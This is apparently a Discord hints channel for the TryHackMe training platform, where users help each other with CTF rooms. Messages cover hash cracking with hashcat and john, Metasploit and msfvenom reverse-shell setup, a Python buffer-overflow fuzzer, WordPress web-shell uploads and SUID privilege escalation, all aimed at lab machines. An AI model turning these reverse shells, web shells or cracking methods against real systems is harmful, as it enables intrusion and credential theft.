#room-hints
hmmm OK
James, if you are referring to the string with that "!" and the password required to extract it, I already found that.
@agile whale the last flag is hidden in an image
yep I just found it
For intro to x86 task 7 question 1. I have tried to analyze what the binary does with the password, I only noticed that extra bytes are added.
ok I give up ... but thank you for your help
I didn't open the extracted file with a hex editor so didn't notice the extra data
at the time
@agile whale I have plugins for it, and I think my text editor picked up on it
@white salmon sometimes taking some rest and starting anew is good
I would have just cat the file at the time, didn't know cat supported unicode
@heavy anvil certainly ... it's just that it's annoying to leave an incomplete room
@agile whale Probably depends on your terminal
hints on anonymous playground?
ive been trying the harder boxes but they seem to be very difficult
What's up?
i was trying to get in ||development.smag.thm/login.php|| and im not getting a response
i'd edit my hosts file
but nothing. I tried editing it a couples of times and copy-pasting the address
What's in your hosts file?
but no luck
Reg: Tartarus, injecting !/bin/sh in the git privilege escalation, throwing !/bin/sh: not found error. Anyone encountered this? Can anyone guide me?
You need the virtual host in there too
@jagged musk it's called a shebang
Cuz the syntax is #!
trying now.
So development.smag.thm is a subdomain of smag.thm. Using DNS, they can resolve to a different IP address or the same IP address. Your hosts file needs the subdomain, in order to make development.smag.thm actually resolve to the right IP @grand pivot
@oblique cliff Thanks Sir Blob!
Might be too early to ask for a nudge on harder, but I've found the ||php files|| on the ||pwd domain||, but I've got no clue where to go from here
What parameter allows us to generate a POC(actual exploit) in xsrfprobe ?
@burnt cosmos
Just read the source code of the files and try to bypass the security functions
hi guys i need pointer for room harder....stuck at enumerating use gobuster, nikto but didnt find anything ! to get in
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
@boreal wren
As mentioned in the description. Closely take a look at every request. Love the instant rule 13 messages xD
can someone tell me how to get password from that cipher text in anonymous playground room
I haven't done the box so take my words with a grain of salt but cyberchef is always a shout
Seeking a hint. I'm working on The Cod Caper - Task 5 - #3. Searched all files owned by pingu, no password found. Private key requires password. Am I missing something? Thanks
Don't know how much of a hint you need but if the private key needs a password I'd look into ssh2john @green merlin
Is the "harder" foothold a result of data mining/discovery, or an enumeration attack, or something else entirely?
i've got the daemon versions, a list of users, a vhostname, a slew of useless cve's for said services.. I'm not sure if i'm supposed to tackle daemons, or try to brute force users .. but dont want an outright answer yet
harder is a new room, so I can only say: read the hints in the description carefully
Looking for a hint on: Set. I have a list of users, but not sure what to do with them except to brute force passwords, which does not seem correct.
Can i ask about harder?
I got stuck
the room is only 1 day old. no hints or help yet
It's okay
anyone did the anonymous_v3 ?
@gilded pasture https://github.com/magnumripper/JohnTheRipper/issues/2125
It's not a challenge box so
It's easier with hashcat IMO
trying with john
Then that link should help
yep, checked, but i'm having problems with rockyou
It's in there, just fine
make sure you're using --wordlist=/usr/share/rockyou.txt
you need --wordlist=
John is fussy
.
pg13
DM me the contents of your hash file
I can confirm it will crack almost immediately tho
Geez I hope I'm not just super blind but even with the hint I can't find the answer.. Completed the whole room except this one question..
Room: rpburpsuite
Would be great if someone could give me a hint
I just did that
Further up the task, it mentions uses for comparer and how we can use it
What might be different for different users?
ugh I got it 
thank you very much!
solved so much stuff before but failed at that ;D
No problem. Glad you got it!
Should i be using metasploit on easy ctf?
and I should be attacking the web server first righttt?
I got stuck
@white salmon
Harder has a community write-up. The hints should be fine...it's all about enumeration.
Writeups are on the room page.
Told us about the weird things
Checkout the "known issues" for this room too
Harder was a rejected HackTheBox challenge box
The machine contains breadcrumbs with htb TLD...bc it was rejected on htb. I will fix this later
The hackthebox team was not able to deploy the target Linux distro...the content was fine.
But the difficulty isn't medium, it's hard
It was set to hard by me before releasing...the thm team decided to go medium
Not my decision making
some thm hard boxes are actually medium ones but this one is defo a medium one imo
Hi, has anybody here done the https://tryhackme.com/room/malresearching room? I am stuck with Task4 Question2 (all the other questions have been solved), I have tested many answers and none of them worked. I don't know if it is a problem I have with the content or with the language (I am not a native speaker)
@wooden mist
Depends on your knowledge base...
I would like to have a small hint to knock this room
yes it does, but this really wasn't a hard one imho
Hey lads
im currently on the ToolsRus room
and am having a problem with the final part, the Metasploit section
Wrong LHOST
I've taken a look at a guide and it's meant to connect to the session, any idea what I might be doing wrong?
Wrong. LHOST.
Can you show options?
It's just a wrong lhost!
really? what is it meant to be?
your VPN IP
ah
Your LHOST needs to match your tun0 IP
You have it set to a virtualbox NAT IP
alright, I get it
The target can't talk to that
hm?
Not in Windows
VPN runs in the VM
Grab your tun0 IP by throwing ip address into Terminal
ip a s tun0
alright, let me try, thanks for the advice Ninja.
We told you that. So it's not going to work until you fix that
still no luck
I checked the fields and they're all correct
and "ip a s tun0" now works
So check your ports and passwords
@stuck fractal
isn't 1234 correct?
I don't know. Check it.
doing that as we speak
hi everyone
im getting problems trying to get a meterpreter shell with a room
/hackpark
Haha. Ha. Ha. Hackpark
What payload did you generate?
||windows/x64/meterpreter/reverse_tcp||
show options in your multi handler and paste a screenshot please
Change the payload in multi handler to the same payload that you generated
and maybe try an unstaged payload if that doesn't work
@stuck fractal there it is!!!
hey, do you think it might be something with my wifi that's causing my metasploit to not work?
sometimes i get stuck with just stupid things
@wind fog No. Because the VPN eliminates that.
thank you for your patience
It's something that's got me before
alright, I shall keep on investigating
Run the VPN troubleshooting script
#bot-commands !vpnscript
alright
holy fek! Yes, it finally worked! Only took 4 hours
thanks for the advice Ninja
you da best
Heeyy you got it. Good on you.
Exploiting Telnet. I have my Kali Machine with Vpn, telnet is ok, i can sniff traffic, on my local machine i execute: msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R
In the telnet session i execute .RUN the result of msfvenom, but nothing happens.
i need help to cracking password in overpass2 can some one help me ??
||$ echo '$6$7GS5e.yv$HqIH5MthpGWpczr3................................GX.5PyMpzAYo3Cg/' > hash.hash
$ sudo john -w=rockyou.txt hash.hash
[sudo] password for secret:
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status||
It won't crack. Will it need much time to crack??
could playing fair be a hint for anonymous? lol, I am not asking for hints, just confirming one.
@lucid crescent it should crack very quickly.. check you have the right format? and I always use --wordlist=/..... as JTR is fussy on this ... https://github.com/magnumripper/JohnTheRipper/issues/2125
ok @oblique shuttle
@lucid crescent also make sure that you are adding salt with the password. It should be cracked in max min or so.
ok
hashcat might be easier @lucid crescent, with the salt it cracks in just a minute or less
any good hint out on the anonymous playground initial foothold? I am out of ideas on deciphering the lowercaseUppercase string.
check the names on the first page
check the usernames
@woven mirage for me ?
@keen willow yes
Trying to solve overpass 2 and got stuck for 2 hours on the Task 1 last question to crack hash. I have found the hashes and pretty sure what mode i have to use with hashcat but dont know why it is not working
can anyone help?
@median compass a problem with hashcat is my GPU
im not using GPU in my linux
so hashcat wont work
@steady elm are you putting the salt in the hash?
yes, but it doesn't have to check a lot, i ran it in the VM not on my host and it cracked just fine
i.e. no GPU
ok maybe i will install graphic driver
@woven mirage hashcat i am using 1710 and this is the hash $6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: I get token length exception error
@median compass hashcat is using GPU if u run it on ur own OS it wont work, else if u run it on ur vm it will work because ur vm has GPU and dont need driver
@lucid crescent Pretty sure it will run on CPU too - https://hashcat.net/forum/thread-8269.html
not sure but as i know it need GPU
@steady elm I don't recognise the hash you're trying to break there, that could be the problem
i dont use hashcat really much
This is what I get when I run hashcat -I on my VM, no GPU to be seen
```
kali@dense merlin:~/Documents/TryHackMe/LookingGlass$ hashcat -I
hashcat (v6.0.0) starting...
OpenCL Info:
OpenCL Platform ID #1
Vendor..: The pocl project
Name....: Portable Computing Language
Version.: OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG
Backend Device ID #1
Type...........: CPU
Vendor.ID......: 1
Vendor.........: AuthenticAMD
Name...........: pthread-AMD Ryzen 7 2700X Eight-Core Processor
Version........: OpenCL 1.2 pocl HSTR: pthread-x86_64-pc-linux-gnu-znver1
Processor(s)...: 8
Clock..........: 3700
Memory.Total...: 10179 MB (limited to 4096 MB allocatable in one block)
Memory.Free....: 10115 MB
OpenCL.Version.: OpenCL C 1.2 pocl
Driver.Version.: 1.5
```
anyway, doesn't matter I guess, if it doesn't work for you it doesn't work!
@steady elm ah sorry, I thought you were speaking about another question
not all hashes you will be able to break
the question asks how many you can break
and also the hash is not that long
:18464:0:99999:7::: this isn't a part of the hash
@keen willow yes
@woven mirage shall i consider it to the reply of my msg (i.e. decipher lowercaseUppercase), or a brand new hint ?
a reply to the message
you know how one character is decoded
try to guess which word could be made from the characters you know and then find a logic to discover the rest
I'm just glad people figured it out lol
Hi, may i have some question about box HaskHell?
I tried to upload the reverse shell in the ||submit|| directory, however I got this error.
What format is your file
Were you able to get the server to run any other Haskell files?
let me try
Can we ask hints for harder rn?
well the room has a writeup accepted doesnt it?
I believe you can @eternal brook
@woven mirage just clarifying that this message looks like i'm telling you to check the writeup, i meant to say that if it has a writeup accepted you can ask questions
Yeah I also saw that rn
It's a new room so I thought maybe like other rooms write-ups and questions will be closed for a while
Yes you did
You downloaded the web page rather than downloading the file @quiet yarrow
So yeah, I haven't got much out of the room. I see a lot that eventually all looks the same || I just saw one kind of redirection to port 8080 /vendor || so I rescanned, the port is closed, ran a script to scan all those dirs again but can't find anything useful...
Harder is the room
check the http requests
there is something on the requests that isnt being used by the website but gives useful info
Ohk alright thanks I'll check :)
Got it thanks termack :)
Just a question is that supposed to be real?
Like box says it's similar to real world pentest...
the creator of the box said it is
^
Anyone who could give me a hint for VulnVersity Recon?
Using the nmap flag -n what will it not resolve?
man nmap
In the time I read the manpage, the machine will go down π
Extend it.
Hints on the Anonymous_v3 ?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Also, that's the machine title rather than the room name
Use the room name or room code
Okay sure, I'm currently decrypting the cipher, I know the pattern used and I know the user involved.
can i pm you on looking-glass @lusty wigeon ? im at the final user. still enumerating
i don't wanna spam rule13 but lets just wait till the day end before hints
Found a box that seems to have a brute force (brute force on an SSH port with a known user). The next flag is a password of 7 characters so I'm assuming it will just be a weak creds within top 10k or something like that.
I can brute force every 7char password from the top 10million passwords, but any suggestions before I start off a big ol hydra brute force?
aa sure, I'll give myself some more time to enumerate
So please slap me on the back of the hand if this question doesn't belong here. This isn't so much to get an answer as I don't quite get a comment made. In "HTTP Web Fundamentals" @stuck fractal says, "you can tell I performed the request from (chrome version 80, from Windows 10)"...
My issue is I do see that but I also see Mozilla, Safari etc... I think it's supposed to be so obvious that I can't find info online to explain this but it's going over my head.
@eternal timber Room?
@stuck fractal https://tryhackme.com/room/basicpentestingjt
It's the User Agent, it tells the server a bunch of stuff @real rock
@eternal timber Try to brute force them
In rockyou
Yeah I assumed as much
Just wanted to see if there was something I was missing before I just threw a brute force at it lol
@real rock So it's the bit that says Chrome 80
Yeah I see the User-Agent but the first thing I see after is Mozilla
There's a breakdown of what each part means
Oh wow thank you Ninja
Mozilla docs are wonderful
i am not able to overflow gatekeeper binary, while sending data by 'nc' it works well, but when i try to do it with python only sending works.
anyone willing to help, i can provide screenshots.
Sure screenshots
No one wants to help ? okay thanks.
@stuck fractal Yeah, rockyou got it pretty quick, also TIL rockyou has 2.5 million 7 character passwords in it
Typically for THM, brute force is meant to take under 5 minutes
Definitely with any newer boxes
Yeah, any challenges I make (outside of THM) I try to stray away from brute force due to the uncertainty of it.
What about port scanning? @stuck fractal 
Hey, that's not in the rule @oblique cliff
Your fault for not using threader or rustscan
Be glad I didn't set it to 10k
Jokes double on you cuz I just don't attempt your boxes until months after they're out cuz I'm a dumb dumb
Show the commands you're using not just the output
nc IP PORT
The python commands
```python
#!/usr/bin/env python3
import socket
import sys
import time

# Simple fuzzer: send an ever-growing buffer of "A"s to the service until it
# stops answering, then report the buffer length at which that happened.
buffer = b"A" * 50
while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        # IP_ADDR is a placeholder for the target machine, as in the original post
        s.connect(("IP_ADDR", 31337))
        print("sending %d bytes" % len(buffer))
        s.sendall(buffer)
        # waits up to 5 seconds for a reply; a timeout raises and ends the loop below
        s.recv(1024)
        s.close()
        buffer += b"A" * 50
    except Exception as e:
        print(e)
        print("Fuzzing crashed at %d bytes" % len(buffer))
        sys.exit()
    time.sleep(1)
```
Screenshots are so much better
no bytes sent.
whats the IP address youre using
and whats the output of the python script youre running
ip address is of my VM, that is correct, coz i can see output on immunity debugger. as gatekeeper is not sending response, so there is no output on python
Any help with Anonymous ?
you have to be more specific about what's giving you a hard time
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Anyone who could point me in the right direction with the second key of Mr. Robot CTF?
I don't really know where I could find ||White coloured font||
@keen willow Are you running gatekeeper on your host OS, a VM, or THM
@hasty zodiac hey I'd be happy to, could you answer those questions jabba just asked so I don't repeat something you may have already tried?
Well, I can't without really spoiling how to get the first key.
Need a lil help with the || bOF of Anonymous Playground || , I was able to call the hidden function but || how do I get the shell because everytime I run the binary || , it just prints the message and exits with || Segmentation Fault ||
Blob just means what you have tried for the second key.
Spoiler text works fine
@oblique cliff running gatekeeper and immunity debugger on VM and connecting it from kali (host)
@mint parcel
@trim haven you finally called me blob!
Oh, it seems I have.
Well, checking through every command and page source.
@shut pollen ?
@keen willow can you dm me. A bit cluttered in here
And looked through the other file next to the one containing the first key
Did you directory bust?
oh shoot
Yep all good so far. Enumerate the possible subdirectories?
@mint parcel > you have to be more specific about what's giving you a hard time
Help with Anonymous ?
Wouldn't be a bad place to start
@shut pollen hmm.. i had the same problem... If i recall correctly,|| if you call the function address it just exit without getting a shell... try pointing it to the next instruction||
|| Instructions as in the c*****sh function ? ||
I don't feel like that's supposed to be part of the experience though, Blob.
You don't think a Wordpress subdirectory that's been set up on a purposely vulnerable box is part of the experience of pwning the box...?
Well, that indeed sounds foolish.
Is that wp's brute forcer tool?
finds vulns in WP
No
lets say in outdated versions, plugins, etc
You don't need that
@hasty zodiac you are going right way keep working in that direction
you may have got the first key I assume?
ya check that
||another key?|| | looked through the other file ||fsocity.dic|| using keywords
here is a hint for you
you won't get other two keys unless you get a shell on the target machine
there is no second key hidden in web pages
god damn it
you need to find your way in
||so basically upload a shell||
not sure how many CTFs you done, but wordpress usually requires credentials to get access and then upload a shell
work on getting the credentials
yeah I have access
I just didnt know I needed to get into the box
||I can just add a shell through plugins, right?||
just google wordpress reverse shell you'll find many articles on how to do it
imma just upload a b374k shell 
@oblique cliff thanks for help
hello there person who found me.
you're welcome
Hi! I've found myself stuck at the beginning of the wgel ctf room. I bruteforced all the directories and I tried to find an exploit for the apache version running but it doesn't work. Any hint would be very appreciated
Yeah, thanks. It was a misleading hint for the second key imo 
indeed
now I just need to dig up the keys
@mossy ermine did you find anything when directory busting?
@oblique cliff The most interesting things are || /sitemap || and || sitemap/images sitemap/sass /sitemap/fonts sitemap/js sitemap/css ||
The other results are html pages for a site template
try directory busting again on that interesting thing
you're also missing something when it comes to the apache page
Hey, I think I might have found an issue with one of the rooms. Can anyone confirm?
#site-bugs @tepid flame
preferably with screenshots and a detailed description of the issue
alright, thanks you.
damn, I do need privilege escalation
yes.
2nd key done 
3rd key was easier
the biggest struggle was the second key smh
thought it all had to do something with the webapp
> you're also missing something when it comes to the apache page
@oblique cliff done. Got the || username || on || index.html || but I really don't find any other subdirs of || sitemap || . I tried all the directories lists that come pre-installed on kali linux
only got 90 points? others got 210 
hmmmm are you sure you directory busted properly...?
you should definitely be finding something else
Oh > hmmmm are you sure you directory busted properly...?
@oblique cliff Wait, I realized only now that there's another directory on kali that contains dir lists. I'm going to check with them
@oblique cliff Lol, damn the || .ssh || directory
I'd do some walkthrough rooms tbh
huh?
walkthrough rooms
rooms that walk you through the tasks and steps
to help teach you
to inject knowledge into your brain
Eg new tools, new vulns
Well, I was asking for any rooms. Even walkthrough ones.
Specific ones.
Well, I'll go with metasploit then
.
hey i'm doing crack the hash room using hashcat ...
and in one question i'm given with 1)hash , 2) salt, 3) rounds
is there any way i could use these 2 extra values to speed up the process ?
Hash = Thing you're cracking
Salt = Thing its encoded with
Rounds = https://security.stackexchange.com/questions/204813/what-are-sha-rounds
If you're cracking the hash without formatting the salt etc. you won't get an answer
ohkay , i'll try that
and any other way to crack the hash of $2y = bcrypt?? I read that this one takes a hell of a time ..
It's possible
Use some logic and only try passwords with the correct length from rockyou
Also I remember people saying that if a BF takes longer than 10 mins (usually, re: THM rooms) you are doing it wrong... I tried 50k passwords last night across 12 different accounts and couldn't crack this ssh .. so I think that I'm not supposed to brute force
so maybe you want to limit it to the top 100k lines of rockyou?
Just filter rockyou down to 4char passwords
system hung up lol
hi all.. trying a buffer overflow but can't overflow the buffer enough to write into eip instruction pointer... I can overwrite ebp basepointer but this gets pushed when the programme tries to return. Anyone got any tips for overflowing to call a specific function address?
Room: https://tryhackme.com/room/jack
Part: User
I'm ||bruting wordpress with 3 users + rockyou.txt|| i still waiting +5min
PD: The tool is ||wpscan||
@oblique shuttle if you can overflow the ebp, you can probably get to the return address. What happens when you try to keep going?
i've tried a massive input (2000 chars) but nothing seems to touch the eip...
which room is this?
and if you overflow it too much the return address is going to point to a segmentation fault (i think), so you cant just way overshoot and expect your overflow to be in the return address
@oblique shuttle run it with breakpoints in debugger? check for bad chars? jump to different address?
@oblique cliff anonymous
oh, i havent done that room so idk if he did something screwy with it
try jumping to a different address
It worked fine for me
You get segfault with ||80 chars||
@white salmon can i dm?
sure
@stuck fractal thx for the new room it's really cool ^^
You're welcome
yes the foothold part is really funny, now I am a bit stuck with the privesc :/
No hints yet.
I know. Im pretty sure that I am missing smh but I will root it ^^
@somber crag Dude same. I've been stuck on it since the day it came out lol. It's driving me a little up the wall. I feel like I'm making a simple mistake but don't know what.
Ditto
Okay, i've managed to secure what looks like a plaintext password and username, and hostname... I tried to ssh to the host, and the username and/or password dont jibe.
I added the hosts, and i'm trying to get in, and the server is pretending it does not exist.. like literally, that vhost does not work. I hit the wall
otoh, the url given divulges where the box came from
I'll be honest, there's a line between a hints chat and a "I'll talk to myself while working through the box" chat
This isn't that second part
I talk in TS, it's not the right channel, no hints, no room help. I get it. Aside from getting a pointer to Muir for typo correction. I do not know who posted it .. It's very excellent so far, but it has a critical flaw in its port
They're also here in the discord
If you read the channel topics, they describe exactly what the channels are meant for.
If you'd like hints, you'll have to actually ask
I am trying to solve Overpass and after starting backdoor it says started listening at but i am not able to connect to it using netcat. what am i missing?
overpass 2
Starting the backdoor?
@trim haven i think we will use the backdoor to connect to the target
ssh -p 2222 <Machine IP>
so we basically cracked the intruder password and then used the same backdoor which he used to open port and connect to that port using ssh. But i dont know why i thought i could use netcat to connect to that machine port
Any hints for Overpass root flag? I checked all the basic stuffs i could for priv esc.
Overpass 1?
yes.
Have you ran linpeas on the machine?
You need to find out what you can and can't control
Alright. I'll do that.
any hint for cracking salted password in overpass2
Did you check out github source code? See if it is pass+salt or salt+pass? Does hashcat have a mode for it ?
Yup
so how do i crack password+salt i couldnt find it from google
Hi i had a doubt the new overpass2 box i have the user now
also I don't think that hash is md5 @cyan token
yes it's not.
so ...
||i found a suid_bash file but to run it you need james password which is in pcap and i used that one and it didnt yield any results is it supposed to be like that||
@lucid crescent it is here in this one and you are correct
you can use some tool to figure what algo it is
and then look for that + salt mode in this and then use hashcat to crack it
||and if i am not wrong you can append the salt with : and also use jtr||
You don't need any password to run the SUID file
sudo -l
i cant run that without a password too
I'm 100% sure you don't need a password for the SUID
i will give it a go
How are you running the file?
i will give that a go but i think i did and didnt get the shell as root
You're not meant to
ohhh okaayy
You're meant to abuse it for privesc
alrightty will give it a go thanks for the help
my problem in overpass2:
```
$ sudo john --format=sha256:salt --wordlist=ctf/rockyou.txt hashes.hash
Unknown ciphertext format name requested
```
That's not how you format
Usually
Also, does someone have a hashes website for hashcat...?
I mean the error does tell you that the format name is incorrect
so how do i crack sha256 + salt in john
i would recommend going with hashcat
i need GPU for hashcat
You don't
you dont
so tell me how to run it on CPU
Also everyone has a GPU so that's not an excuse
it will be faster on a better GPU but that doesnt mean you cant run it
also you can download hashcat on your main windows
and use that to crack stuff
it will be faster but with this one you wont even need to wait that long
Hi. I have a problem in scripting room. When I am trying to connect to the next port on server, it gives me the connection refused error. Tried to google this error and didn't find anything. Can u give some hints on what to check to solve this error?
hashcat -m modenumber texthashesfile.txt rockyou.txt -O
you can remove the -O and add --force i think if i am not wrong
whats the problem??
nope thats not what you are looking for in this case
thats for sha1
you need it for something else
```
hashcat (v5.1.0) starting...
* Device #1: Not a native Intel OpenCL runtime. Expect massive speed loss.
You can use --force to override, but do not report related errors.
No devices found/left.
Started: Tue Aug 18 11:15:32 2020
Stopped: Tue Aug 18 11:15:32 2020
```
add --force at the end
and thats not the right mode
look for what hash you are cracking
and then find its hash-mode
||-m 1410||
i cant keep confirming i think
cause that would be kinda giving the answer
again its not correct if you get this
```
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 4096/13861 MB allocatable, 8MCU
Hashfile 'hash.hash' on line 1 ($6$7GS...VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/): Separator unmatched
No hashes loaded.
Started: Tue Aug 18 11:17:38 2020
Stopped: Tue Aug 18 11:17:38 2020
```
whats the problem??
wrong mode and wrong algo
again research what algo you are cracking and look for its appropriate hash mode
is this ||6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed||a right one??
Look at main.go in github. What algorithm is it ?
i dont remember that on the top of my head and again the hash and salt have to be separated with : and look for the right algo
it was ||sha512||
you got it?
```
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 4096/13861 MB allocatable, 8MCU
Hashfile 'hash.hash' on line 1 (bdd04d...7d8391dfc885d0e9b68acd01fc2170e3): Separator unmatched
No hashes loaded.
Started: Tue Aug 18 11:23:05 2020
Stopped: Tue Aug 18 11:23:05 2020
```
no @brave bear
can someone give me a nudge on the dijinn room do i have to answer all 1000 question??
@lucid crescent Show us the hash.hash file please
i cant get whats the problem. i copied and pasted the hash which is written in main.go and found that it was ||sha512|| and that is ||password + hash||
yeaah but you have to add a separator
||bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3|| @trim haven
yup you dont have the separator for the password and hash
No
You need to tell the tool where the salt is
I'm 90% sure the salt is there it's just not in the format
||1c362db832f3f864c8c2fe05f2002a05|| here is the salt
in hash.hash
ok
||$ cat hash.hash | grep 1c362db832f3f864c8c2fe05f2002a05|| found nothing in it
ok
anyone
thisisthehash:thisisthesalt
@sinful plaza
user or root?
and where are you?
what have you tried
You gotta give some context first
which step are you at etc.
try answering the question but it is taking too long
@brave bear
which binary again
||i found this 14344392|| but it was incorrect
and what have you tried
Hey Guys. I would really appreciate any hint on the boiler ctf room. Until now I've enumerated the services and found some directories with dirbuster. I also have a sort of password (not sure) found on || /joomla/_files/index.html ||
Thank you for your attention
can you show the hash.hash file again dude
user or root?
and where are you?
what have you tried
@brave bear user
soo the genie binary
you dont have to answer the thing you have to find a certain command that you can use in it
||bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3:1c362db832f3f864c8c2fe05f2002a05|| @brave bear
Think about how you can get that command
@brave bear ohh thanks
i think the hash is right
@brave bear sure thanks
Overpass2, how am i supposed to || abuse setuid_bash || ? A realllly tiny tiny bit of hint would be naice.
nvm @lucid crescent i think thats the wrong hash you got there
@mossy ermine Just a little up. Really stuck on the last question on task 1
@cyan token what have u try??
Have you tried running it
After running, I'm still james...
Run it, do you get a prompt?
yes
And have you tried running help
ohkk thanks. I'll figure it out now.
@brave bear can i DM
sure
Hey I think I got a ||sha1 hash || in harder room I'm trying to crack it with hashcat but it's taking a lot of time
Does it take long to crack?
@brave bear can u tell me which hash i must to crack???
its in the pcap
Are you still on overpass 2?
i copied that from main.go file
@trim haven no, i went to somewhere
I mean you used the right one for hashcat
i must to crack james password from pcap right??
@brave bear he tell
Did you crack the hash for the backdoor?
u mean main.go
Task 4 correct?
I mean 3
SHOOT
I mean 2
This one Crack the hash using rockyou and a cracking tool of your choice. What's the password?
yes
You were using the right hash earlier
You're meant to use the one from question 3
What was the hash that the attacker used? - go back to the PCAP for this!
Then you go to the github to get the salt
If you look on hash lists for hashcat, it will say Hashname, hash:salt
As the hash is salted
You need to store it in the file in that format
Then hashcat will recognise that the hash has a salt and will use the salt
ok
You can use this to research salts https://en.wikipedia.org/wiki/Salt_(cryptography)
Hey, room : Overpass_v2.
I got the pass for [TASK2] #4 and it's correct. is it for user ||james||
The "Hacker" changes the password so none of the passwords from the /etc/passwd file will work
I cracked it with the salt from |||github||| and the last hash he got
Oh so you cracked it?
Well the whole of that section is about analysing the backdoor
Maybe specify a certain port ?
Perform your nmap scan again and look for any strange ports
Okay thank you
@trim haven salt is ||1c362db832f3f864c8c2fe05f2002a05|| right???
Yup
Now put it in the file hash.txt or whatever in the format ||hashfromquestion4:1c362db832f3f864c8c2fe05f2002a05 ||
and hash type is ||sha512||??
Are you using kali?
yes
In your terminal type hash-identifier then paste the hash when it prompts you to
@trim haven hey any hints on priv esc after running that ||binary||
ls -lAh ~
Look closely in the home directory @limber iron
That's a fancy command @trim haven
(stole it from James)
@final mortar Hha i am i don't know really what i'm looking at
@limber iron It shows you hidden files..
Yesss it did
It's not something special tho. -A doesn't list . and .. and -h displays size with units
I will stick to ls -la
@final mortar haha me too
So you found something useful ?
Is that ||.suid.bash|| ?
maybe, what do you think
Haha i did run it and i still have no idea on how to escalate to root with it xD
try googling suid and bash together maybe
Okay sure thanks a lot
try gtfo, google, things. do research
Overpass 2, am i going in the right direction || bash 4.4 has a priv esc vulnerability - autocompletion ||?
I mean
Thank you @final mortar got it
Doubt it?
hm
Have you ran ls -lAh ~ in the home directory?
We just discussed that with bvr0n @cyan token feel free to scroll up
i see that heheh
I can see that hidden file using the usual ls -la why should i use that?
Fancy command is better
xD sure
lol
Hello, i'm stuck on root in Looking Glass. Can you give me a little hint please? Thanks
I apologize. The room is new and hints aren't offered for the first several days of a release.
overpass 2 is walkthrough, that doesn't apply to the rule
sudo password?
i forget -p
hi all... can i ask a little hint on Overpass2? i completed the TASK2, but i have no idea how to use the backdoor to hack back in....
i figured it was not a ssh service... but still have no idea how to use it... in the github there is no instruction/readme about how to use it...
The backdoor is running on a port, try to discover which port
2222 tcp ethernetip-1 open OpenSSH 8.2p1 Debian 4 protocol 2.0
i got this from nmap.... but still can't ssh user@ip:222
2222^
ssh: Could not resolve hostname ip:2222: Name or service not known
oh ok... i used ip:port... i will look at man
thanks
anyone know this cipher text ||hE a dC fH a :: hE a dC fH a hA iJ a eI aD jB cB hH gA a fH fN||
?
you need to figure out the logic
try to figure out what words could come from this encoded message so you can discover how to decode it
i dont understand this ciphertext
this cipher was made by the creator for this box
you wont find it on the internet
you need to make a script yourself and decode it
yes
break it, task 2 #3: Is there a logical way of solving this?
If you're talking about the python coding room, we can't really give you a hint
anyone give me a hint on getting the root.txt on overpass2...how do i execute the function of the py file to get root? ive been stuck for hours
@tight tendon There's no python file
the backdoor file used by the hackers??
ls -lAh ~ and you will see everything you need
@tight tendon Not python
okay i will try thank you
Very much not python
There's a rather obviously named file in your home directory
You can use that after some research
So, I'm stuck on Linux Challenges, flag #16. I've tried using findmnt and find commands, but haven't been able to turn anything up. I'm sure I'm missing something simple or I've gone down the wrong rabbit hole trying to find the flag.
Ok, I'll keep looking around, thanks!
Hi All, Any hint regarding initial foothold for SET room...
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Room: Wgel Ctf
I have got the user flag need hint for priv esc
I have tried to transfer file using ||wget|| but it is asking for password even when I'm allowed to run that command without password
Have you tried googling wget privilege escalation
gtfo isn't guaranteed to work everytime
I wasn't doing it using gtfo
I found one article on that priv esc
nvm I got it
silly mistake
The first one actually tells you how to do it ^^
I was typing /user/bin/wget instead of /usr/*
It's all good, as long as you learned something
i found an article, tried creating my own hash and passed it, but i do not get any results. any hints on what i'm doing wrong?
harder room
hi , msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R
In the telnet session i execute .RUN the result of msfvenom, but nothing happens
